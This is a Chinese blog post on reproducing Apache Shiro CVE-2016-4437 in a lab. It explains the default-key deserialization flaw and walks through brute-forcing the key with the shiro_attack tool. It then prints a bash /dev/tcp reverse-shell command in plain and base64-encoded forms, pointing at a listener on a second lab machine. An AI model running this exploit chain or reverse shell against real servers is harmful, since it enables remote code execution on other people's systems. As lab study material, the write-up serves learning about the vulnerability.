shiro CVE-2016-4437漏洞复现

最新推荐文章于 2024-02-14 23:01:34 发布
最新推荐文章于 2024-02-14 23:01:34 发布
阅读量381 收藏 7
点赞数 7
分类专栏: 漏洞复现 文章标签: 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71090536/article/details/135861216
版权

shiro简介

shiro 是 java 的框架,分版本

shiro 框架:一个安全的用于管理 java 网站登录授权的框架

shiro 框架之所以安全:

是因为其传输过程 admin ---> 序列化 ---> aes 加密 ---> base64编码

最后攻击者只能拿到 base64 加密的密文,可以解密 base64,但若想解密aes则必须要有密钥,但由于 shiro 框架在传输过程中不传输密钥,故无法进行解密无法获得序列化后的字符串,也就无法利用反序列化漏洞

但为什么有 shiro 反序列化漏洞呢?

因为建好 shiro 框架后开发者出示了几个默认账密供登录,以表明可正常使用该框架,故而会有默认密钥,但运维人员并未删除默认密钥,故造成漏洞

漏洞利用条件

默认密钥

利用链

环境启动

                  Kali:192.168.2.235

                 win10:192.168.2.215

利用工具

shiro反序列化自动利用工具 --- shiro_attack-4.7.0-SNAPSHOT-all

PS:工具可从 github 下载,配置环境可参照上一篇所示,有具体步骤

漏洞复现

1. Kali 开启docker环境

sudo docker-compose up -d

2. 在shiro 工具路径下输入“cmd”,打开命令窗口

3. 在打开的cmd窗口键入以下命令,运行该工具的 jar 包

java -jar shiro_attack-4.7.0-SNAPSHOT-all.jar

打开工具后,输入目标IP和端口,首先爆破密钥

找到密钥 key 后,需检测当前利用链,显示发现构造链后,需爆破利用链及回显

爆破成功后,方可在 “命令执行”中输入命令,验证是否成功得到回显信息,可看到下方输入命令“id”后,回显成功,故可尝试反弹shell

4. 首先在 win10 中利用 Yakit 开启监听,也可利用 NC 等监听工具

5. 监听完成后,输入反弹shell的命令,进行反弹,多次尝试,可以在百度搜索各类反弹shell,反弹shell 中的 IP和端口均为 win10 本机的

# 反弹shell
bash -i >& /dev/tcp/192.168.2.215/6666 0>&1
# 上述反弹shell经过base64编码后
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMjE1LzY2NjYgMD4mMQ==
# 将base64编码后的字段加入echo,后利用bash命令构成反弹
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMjE1LzY2NjYgMD4mMQ==
}|{base64,-d}|{bash,-i}

6. 反弹 shell 执行成功后即可执行RCE


 

梅子酸糖803
关注
  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle 漏洞利用
03-29
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle Shiro721 RememberMe Padding Oracle影响版本: - Apache Shiro 1.2.5,1.2.6,1.3.0,1.3.1,1.3.2,1.4.0-RC2,1.4.0,1.4.1 CVE-2016-4437 ...
[CVE-2016-4437] Apache Shiro 安全框架反序列化漏洞复现与原理详细分析
Specif1c的博客
10-21 4625
Apache Shiro是一个强大且易用的 Java安全框架,执行身份验证、授权、密码和会话管理。shiro 相比于 springsecurity 简单许多,官方号称 10 分钟就能学会。shiro 反序列化漏洞Java 经典漏洞,于2016年被挖掘出来,到现在依旧很多系统存在该漏洞,非常值得学习,对加深 shiro 认证机制的理解以及java代码审计颇有帮助。
详细shiro漏洞复现及利用方法(CVE-2016-4437
热门推荐
dreamthe的博客
04-26 2万+
该篇文章比较详细的介绍shiro漏洞利用,无论是shiro漏洞图形化工具利用,还是shiro漏洞结合JRMP我觉得比大多数文章都详细,如果你对网上结合JRMP反弹shell不是很明白,非常推荐来看看这篇文章。另外漏洞利用工程中用到的工具以及代码都上传到百度网盘,供大家使用,在文章最后哦。
CVE-2016-4437 Shiro反序列化漏洞复现
weixin_45260839的博客
05-15 2707
CVE-2016-4437 Shiro反序列化漏洞复现
CVE-2016-4437---Shiro反序列化漏洞
qq_44880255的博客
08-10 3959
1、影响版本 Apache Shiro <= 1.2.4 2、漏洞原因 Apache Shiro默认使用了CookieRememberMeManager。其处理cookie的流程是: 得到rememberMe的cookie值;Base64解码;AES解密;反序列化。 然而AES的密钥是硬编码的,即AES加解密的密钥是写死在代码中的,攻击者可以构造恶意数据造成反序列化漏洞。 3、漏洞复现 这里使用的环境是Kali中的vulhub和docker。 首先进入目录vulhub/shiro/CVE-2016
Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )
yy
03-28 9030
Shiro 1.2.4 反序列化漏洞
Apache Shiro身份验证绕过漏洞(CVE-2020-13933)
07-17
直接使用java -jar srping....war命令运行即可 执行之后,访问http://主机的IP:8888/admin/*或者http://主机的IP:8888/login
shiro-cve-2020-17523:shiro-cve-2020-17523 漏洞的两种绕过姿势分析 以及配套的漏洞环境
05-23
Apache Shiro 两种姿势绕过认证分析(CVE-2020-17523) 0x01 漏洞描述 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何...
shiro-core 低版本漏洞检测
01-31
shiro-core 低版本漏洞检测工具
shiro-core-1.7.1 jar
07-12
shiro shiro-core-1.7.1 jar shiro漏洞
反序列化漏洞(一)Shiro漏洞CVE-2016-4437复现
最新发布
02-14 866
反序列化漏洞(一):反序列化漏洞原理、Shiro漏洞原理和CVE-2016-4437复现
shiro反序列化漏洞CVE-2016-4437
iO快到碗里来
09-14 4573
0x00 Java安全 一 、RMI/JRMP协议 TCP/IP协议相信大家都很了解了,不了解的可以自行百度。在这里我们先来简单来讲讲JRMP协议相关内容。JRMP是一个Java远程方法协议,该协议基于TCP/IP之上,RMI协议之下。也就是说RMI协议传递时底层使用的是JRMP协议,
Apache Shiro 默认密钥致命令执行漏洞CVE-2016-4437
12-21 3349
目录 1 漏洞描述 2 漏洞特征 3 修复建议 4 解决办法 4.1 升级shiro到最新版本 4.2 自定义生成AESkey(Apache Shiro使用官方自带的生成AES密钥) 5 参考网址 1 漏洞描述 Apache Shiro 是ASF旗下的一款开源软件,它提供了一个强大而灵活的安全框架,提供身份验证、授权、密码学和会话管理。在Apache Shiro部分旧版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中,攻击者可以使用Shiro的默认密钥...
shiro反序列化漏洞复现(CVE-2016-4437)
huangyongkang666的博客
04-14 3537
shiro反序列化漏洞复现(CVE-2016-4437) 1.漏洞简介 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro易于理解的API,开发者可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序 漏洞原理: 在Shiro <= 1.2.4中,反序列化过程中所用到的AES加密的key是硬编码在源码中,当用户勾选RememberMe并登录成功,Shiro会将用户的cookie值序列化,AES加密,接着base64编
shiro反序列化漏洞复现CVE-2016-4437
wangzhifei1的博客
01-19 829
Apache Shiro是一个强大且易于使用的Java安全框架,提供认证、授权、加密以及会话管理功能。CVE-2016-4437具体涉及了Apache Shiro在使用记住我(RememberMe)功能时的反序列化漏洞
Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437)
qq_51163834的博客
06-05 1833
Apache Shiro框架提供了记住密码的功能,用户登录成功后会将用户信息加密,加密过程:用户信息=>序列化=>AES加密=>BASE64编码=>RememberMe Cookie值。如果用户勾选记住密码,那么在请求中会携带cookie,并且将加密信息存放在cookie的rememberMe字段里面,在服务器收到请求对RememberMe值,先进行base64解码然后AES解密在反序列化,这个加密过程如果我们知道AES加密的密钥,那么我们把用户信息替换成恶意命令,就导致了反序列化RCE漏洞
Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437
m0_61506558的博客
11-06 2488
关于shiro在2019年爆出来的漏洞,利用的条件相对来说比较苛刻,不仅要有一定的权限登入进去,进去之后密钥爆破也不一定可以成功,环境不好搭建,感兴趣的师傅可以看看,本篇文章介绍的是有关shiro反序列化的漏洞,(一)基本介绍。
CVE-2016-4437
08-14
CVE-2016-4437是关于Apache Shiro的一个安全漏洞。这个漏洞允许攻击者在受影响的应用程序上执行远程代码执行攻击,进而获得系统访问权限。在此漏洞中,攻击者可以通过反序列化攻击利用Shiro的RememberMe功能,从而...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值